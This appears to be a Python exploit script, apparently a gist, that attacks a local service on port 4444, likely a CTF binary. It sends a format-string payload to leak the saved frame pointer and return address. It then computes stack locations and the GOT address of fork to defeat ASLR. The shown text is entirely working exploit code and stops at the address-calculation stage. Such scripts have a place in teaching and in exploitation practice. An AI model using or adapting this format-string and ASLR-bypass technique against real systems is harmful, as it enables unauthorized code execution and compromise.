import netcatlib | |
# Step 0 --- Connect to the target | |
nc = netcatlib.Netcat("localhost", 4444) | |
print "[+] Connected" | |
# Step 1a --- Defeating ASLR with information leakage: location of stack | |
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") | |
nc.read_until("Insert name: ") | |
nc.write(INFOLEAK+"A"*(100-len(INFOLEAK))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
nc.read_until("Uranium in nuclear plant \"") | |
ebp = int(nc.read_until(":ENDEBP:")[:-8], 16) | |
print "[+] Saved frame pointer :", hex(ebp) | |
location_ebp = ebp - 0x440 | |
location_ebp_printf = location_ebp - 0x30 | |
location_payload = ebp + 0x20 + 10*112 | |
print " > Location saved fp :", hex(location_ebp) | |
print " > Location fp in printf :", hex(location_ebp_printf) | |
print " > Location of 1st payload :", hex(location_payload) | |
# Step 1b --- Defeating ASLR with information leakage: location of stack | |
ret = int(nc.read_until(":ENDRET:")[:-8], 16) | |
print "[+] Return address :", hex(ret) | |
location_got_fork = ret + 0x2E8E | |
print " > Location of fork in GOT :", hex(location_got_fork) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment